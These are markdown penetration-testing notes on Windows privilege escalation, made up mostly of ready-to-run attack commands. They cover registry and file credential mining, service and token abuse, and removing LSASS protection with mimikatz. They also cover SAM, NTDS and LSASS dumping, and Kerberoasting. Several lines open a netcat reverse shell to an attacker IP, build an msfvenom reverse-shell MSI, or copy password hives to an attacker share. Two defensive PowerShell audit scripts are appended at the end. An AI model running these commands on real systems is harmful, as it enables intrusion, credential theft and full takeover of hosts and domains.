# Windows Privilege Escalation

## Links

* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)
* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
* [privescheck](https://github.com/itm4n/PrivescCheck)
* [windows exploit suggester](https://github.com/bitsadmin/wesng)
* [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)

## Account Types

* __Administrator__, local & domain
* __Standard__, local & domain
* __Guest__
* __System__, local system, final escalation
* __Local Service__, makes anonymous connections over the network
* __Network Service__, default service account, authenticates over the network

## Enumeration

### Users & Groups

```sh
whoami /priv
net users
net localgroup
query session
qwinsta
```

### Files

* [powershell](../../../../enumeration/windows/powershell.md)

### System

```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

* Installed software, check for existing exploits

```sh
wmic product get name,version,vendor
```

* Services

```sh
wmic service list brief | findstr "Running"
```

### Logfiles and Registry

```sh
cmdkey /list
```

* Keys containing passwords

```sh
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### AD Credentials

* Check AD's NTDS (configuration database) and SYSVOL (policy distribution through the domain)

```sh
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
```

#### NTDS

* Check the description field of AD users
* NTDS consists of three tables
  * Schema
  * Link
  * Data
* Located under `C:\Windows\NTDS`
* The file is locked by AD at runtime
* The SYSTEM boot key is needed to dump the NTDS

## Exploit

* __Use found credentials__

```sh
runas /savecred /user: reverse_shell.exe
```

### DLL Hijacking

* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path

* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)

### Token Impersonation

* `SeImpersonatePrivilege` is necessary, check via `whoami /priv`
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)
* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)

### Scheduled Tasks

* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`
* `Autoruns64.exe`

### MSI Elevated Installer

* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### accesschk64 Permissions

* Check access to files and folders

```sh
accesschk64 -wvu "file.exe"
```

* If permission `SERVICE_CHANGE_CONFIG` is set

```sh
sc config binPath= "net localgroup administrators user /add"
```

* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
* Any other binary works as well. Copy the compiled portable executable from `service_escalation` onto the binary path and restart the service afterwards.
#### accesschk64 for Services

```sh
accesschk64 -qlc "service.exe"
```

* If permission `SERVICE_ALL_ACCESS` is set the service is configurable; upload a reverse shell

```sh
icacls C:\Windows\Temp\shell.exe /grant Everyone:F
```

* Reconfigure and restart the service

```sh
sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService
```

### Startup Application

* Put a reverse shell in place of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`

### Password Mining

* Set up metasploit

```sh
use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass
```

* Visit the site on the target

### Unattended Windows Installation

* Investigate the following paths to potentially find user credentials

```sh
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

* Watch out for the `` tags

### Powershell History file

```sh
Get-Content $env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

### Internet Information Services (IIS)

* Default web server on Windows
* Paths containing credentials are the following

```sh
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

### PuTTY

* Saved proxy password credentials may be found via

```sh
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s
```

### schtask and icacls

* Check `schtasks /query /tn %TASK_NAME% /fo list /v`
* Check the script of the scheduled task, `F` means full access

```sh
icacls
```

* Put the payload inside the script

```sh
echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" >
```

* Run the task

```sh
schtasks /run /tn
```

### Always Install Elevated

* These should be set

```sh
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

* Craft a `*.msi` file with a payload

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi
```

* Upload and execute via

```sh
msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi
```

### Service Misconfiguration

* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`

```sh
sc qc apphostsvc
```

* Check the found permissions via

```sh
icacls
```

* If the service binary path is writeable, move the payload to its path and grant permissions

```sh
icacls /grant Everyone:F
```

```sh
sc stop
sc start
```

* Catch the reverse shell

Other ways are:

* The Discretionary Access Control List (DACL) can be opened via right click on the service, then properties
* All services are stored under `HKLM\SYSTEM\CurrentControlSet\Services\`

### Unquoted Service Path

* If `BINARY_PATH_NAME` contains spaces and is not quoted, the path is resolved at every space from left to right. If a binary with a matching name exists in that directory, it is started.
* A directory created at install time inherits the permissions of its parent. Check it via

```sh
icacls
```

* Use the `service-exe` payload format in msfvenom, upload the payload and place it on the path with a name matching the partial service path
* Set permissions

```sh
icacls C:\Path\to\service.exe /grant Everyone:F
```

### Permissions

* [priv2admin](https://github.com/gtworek/Priv2Admin)
* `whoami /priv`

#### SeBackup / SeRestore

* If `SeBackup / SeRestore` (read/write on all files) is set, an elevated `cmd.exe` may be opened
* Download the `SAM` and `SYSTEM` hives

```sh
reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam C:\Windows\Temp\sam.hive
```

* or

```sh
copy C:\Windows\System32\config\sam \\ATTACKER_IP\
```

* Start an SMB server on the attack machine and copy the hives over

```sh
copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
```

* Dump the hashes

```sh
secretsdump.py -sam sam.hive -system system.hive LOCAL
```

* or meterpreter on the target

```sh
hashdump
```

* Use pass the hash to log in

```sh
psexec.py -hashes administrator@$TARGET_IP
```

#### SeTakeOwnership

* If `SeTakeOwnership` is set one can take ownership of every file or service.
```sh
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant :F
copy cmd.exe utilman.exe
```

* Log out, then on the login screen click on `Ease of Access`

#### SeImpersonate / SeAssignPrimaryToken

* Rogue Potato
* Execute a process as another user
* Service accounts operate through impersonation
* Check privileges via `whoami /priv` for these
* The __Object Exporter Identifier (OXID)__ resolver is contacted via DCOM on port 135; redirect it to the attacker's socket

```sh
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
```

* Catch the connection of the potato executable from the target via netcat

### Volume Shadow Copy Service

* Take a look at the volumes via

```sh
vssadmin list shadows
```

* Copy `sam` and `system` from the shadow copy

```sh
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
```

### Dump LSASS

* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `Create dump file`
* Use `procdump.exe` from the Sysinternals suite as an alternative to `taskmgr.exe`
* Extract the dump via mimikatz

```sh
privilege::debug
sekurlsa::logonpasswords
```

### LSASS Protection

__The bypass is needed most of the time in order to dump passwords__

* If the dump cannot be created because LSASS is protected, change the `RunAsPPL` DWORD to `0` under

```sh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
```

* Alternatively, use mimikatz

```sh
privilege::debug
!+
!processprotect /process:lsass.exe /remove
```

* `!+` loads `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory this file lies in__

### Windows Credential Manager

* Can be found via `Control Panel` -> `User Accounts` -> `Credential Manager`
* Alternatively, the command line can be used

```sh
vaultcmd /list
vaultcmd /listproperties:"Web Credentials"
vaultcmd /listcreds:"Web Credentials"
```

* Extract the password via the powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1)

```sh
powershell -ex bypass
Get-WebCredentials
```

* Via mimikatz if administrative permissions have been gained

```sh
privilege::debug
sekurlsa::credman
```

### Ntdsutil

* This can be done if administrative permissions on the DC have been gained
* Used to maintain the AD database, delete objects, take snapshots and set Directory Service Restore Mode (DSRM)

#### Locally extracting ntds.dit

* This can be done to gather the system boot key
* No AD credentials are needed
* Three files are needed
  * `C:\Windows\NTDS\ntds.dit`
  * `C:\Windows\System32\config\SYSTEM`
  * `C:\Windows\System32\config\SECURITY`
* Locally dumping all three needed files is done via

```sh
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q"
```

* Use `secretsdump` to extract `ntds.dit`

```sh
secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
```

#### Remotely dumping ntds

* Needs an account with the following AD rights
  * Replicating Directory Changes
  * Replicating Directory Changes All
  * Replicating Directory Changes in Filtered Set
* Mimikatz or impacket can be used to gain credentials
* Impacket's secretsdump.py via

```sh
secretsdump.py -just-dc /@$DC_IP
secretsdump.py -just-dc-ntlm /@$DC_IP
```

### Local Administrator Password Solution (LAPS)

* This is possible if the user whose credentials we possess is a member of the group allowed to make password changes
* Replaces GPP, see below
* There are two interesting attributes
  * __ms-mcs-AdmPwd__ contains the plain text password of the local Administrator
  * __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password
* __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__
* If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE`
* List the cmdlets for LAPS

```sh
Get-Command *AdmPwd*
```

* Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output

```sh
Find-AdmPwdExtendedRights -Identity
```

* Enumerate which hosts have LAPS enabled
* Impersonate the user and execute the following, which displays the password

```sh
Get-AdmPwdPassword -ComputerName
```

* Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users

```sh
net groups
net user
```

#### Group Policy Preferences

* Provisions administrative groups through the domain via SYSVOL
* Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN)
* Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it

### Kerberoasting

* Initial (low level) credentials are needed
* A __Service Principal Name (SPN)__ account must be known, e.g. the IIS web user or SQL users

```sh
GetUserSPNs.py -dc-ip $DC_IP /
```

* Take a look at `Name` in the output and use it to request a TGS ticket

```sh
GetUserSPNs.py -dc-ip $DC_IP / -request-user
```

* Crack the kerberos hash

```sh
hashcat -m 13100 -a 0 hash.txt wordlist.txt
```

### AS-REP Roasting

* `Do not require Kerberos pre-authentication` must be set in the AD user's account login settings. A password is used instead
* Gather a list of potential users with this setting configured

```sh
GetNPUsers.py -dc-ip $DC_IP / -usersfile users.txt
```
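### Hardening check: service ImagePath audit

Added example for the accesschk64 / Service Misconfiguration and Unquoted Service Path sections above; it is not part of the original notes. It reads every service's `ImagePath` from the `HKLM\SYSTEM\CurrentControlSet\Services` hive the notes point at, flags unquoted paths with spaces and binary paths that look replaced by a command, and offers a quoting fix. The suspicious-pattern regex is a heuristic I chose, not a Windows-defined list.

```powershell
# Added hardening check, not from the original notes. Run as Administrator.
$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Test-UnquotedImagePath {
    param([string]$ImagePath)
    # Only the executable part matters; arguments after the .exe may contain spaces.
    $exe = ($ImagePath -split '\.exe\b', 2)[0]
    return ($ImagePath -notmatch '^\s*"') -and ($exe -match '\s')
}

function Get-ServiceImagePathFindings {
    # One object per service whose ImagePath is unquoted or looks tampered with.
    # The command/location pattern is a heuristic (assumption); review each hit before acting.
    Get-ChildItem -Path $ServicesKey | ForEach-Object {
        $prop = Get-ItemProperty -Path $_.PSPath -Name ImagePath -ErrorAction SilentlyContinue
        if (-not $prop) { return }
        $path = [string]$prop.ImagePath
        $findings = @()
        if (Test-UnquotedImagePath $path) { $findings += 'UnquotedPath' }
        if ($path -match 'net\s+(localgroup|user)\b|cmd(\.exe)?\s+/c|\\(Temp|Users)\\') {
            $findings += 'SuspiciousCommandOrLocation'
        }
        if ($findings) {
            [pscustomobject]@{ Service = $_.PSChildName; ImagePath = $path; Finding = ($findings -join ',') }
        }
    }
}

function Repair-UnquotedImagePath {
    # Quotes the executable portion so Windows stops probing C:\Program.exe,
    # C:\Program Files\Vendor.exe, ... before reaching the real binary.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$ServiceName)
    $key  = Join-Path $ServicesKey $ServiceName
    $path = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if ((Test-UnquotedImagePath $path) -and ($path -match '^(?<exe>.+?\.exe)(?<args>.*)$')) {
        $fixed = '"{0}"{1}' -f $Matches.exe, $Matches.args
        if ($PSCmdlet.ShouldProcess($ServiceName, "set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString
        }
        return $fixed
    }
    return $path
}

Get-ServiceImagePathFindings | Format-Table -AutoSize
# Dry run of the fix for every unquoted path; drop -WhatIf to apply, then restart the service.
Get-ServiceImagePathFindings | Where-Object Finding -like '*UnquotedPath*' |
    ForEach-Object { Repair-UnquotedImagePath -ServiceName $_.Service -WhatIf }
```

Some Microsoft services legitimately run unquoted from paths without spaces, so only the `UnquotedPath` hits need the repair; `SuspiciousCommandOrLocation` hits are for manual review.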
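### Hardening check: registry baseline for installer and LSASS settings

Added example for the Always Install Elevated and LSASS Protection sections above; it is not part of the original notes. It checks the two policy keys and the `Lsa` key quoted in those sections against the expected safe values (`AlwaysInstallElevated` absent or `0` in both hives, `RunAsPPL` set) and can remediate drift. The value name `AlwaysInstallElevated` is the real policy value under the keys the notes query; the HKCU check only covers the user running the script.

```powershell
# Added baseline check, not from the original notes. Run as Administrator.
$Baseline = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'; Name = 'AlwaysInstallElevated'; Want = 0 },
    @{ Path = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'; Name = 'AlwaysInstallElevated'; Want = 0 },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';           Name = 'RunAsPPL';              Want = 1 }
)

function Test-PrivEscRegistryBaseline {
    # Returns one row per setting; -Remediate writes the expected value where it drifted.
    [CmdletBinding(SupportsShouldProcess)]
    param([switch]$Remediate)
    foreach ($b in $Baseline) {
        $actual = (Get-ItemProperty -Path $b.Path -Name $b.Name -ErrorAction SilentlyContinue).($b.Name)
        # An absent AlwaysInstallElevated is safe (MSI runs as the user); an absent RunAsPPL is not.
        $ok = if ($b.Want -eq 0) { -not $actual } else { [int]$actual -ge $b.Want }
        if (-not $ok -and $Remediate -and $PSCmdlet.ShouldProcess("$($b.Path)\$($b.Name)", "set to $($b.Want)")) {
            if (-not (Test-Path $b.Path)) { New-Item -Path $b.Path -Force | Out-Null }
            Set-ItemProperty -Path $b.Path -Name $b.Name -Value $b.Want -Type DWord
            $ok = $true   # RunAsPPL only takes effect after a reboot
        }
        [pscustomobject]@{
            Setting   = "$($b.Path)\$($b.Name)"
            Actual    = $actual
            Expected  = $b.Want
            Compliant = $ok
        }
    }
}

Test-PrivEscRegistryBaseline | Format-Table -AutoSize
# Test-PrivEscRegistryBaseline -Remediate -WhatIf   # preview the fixes before applying them
```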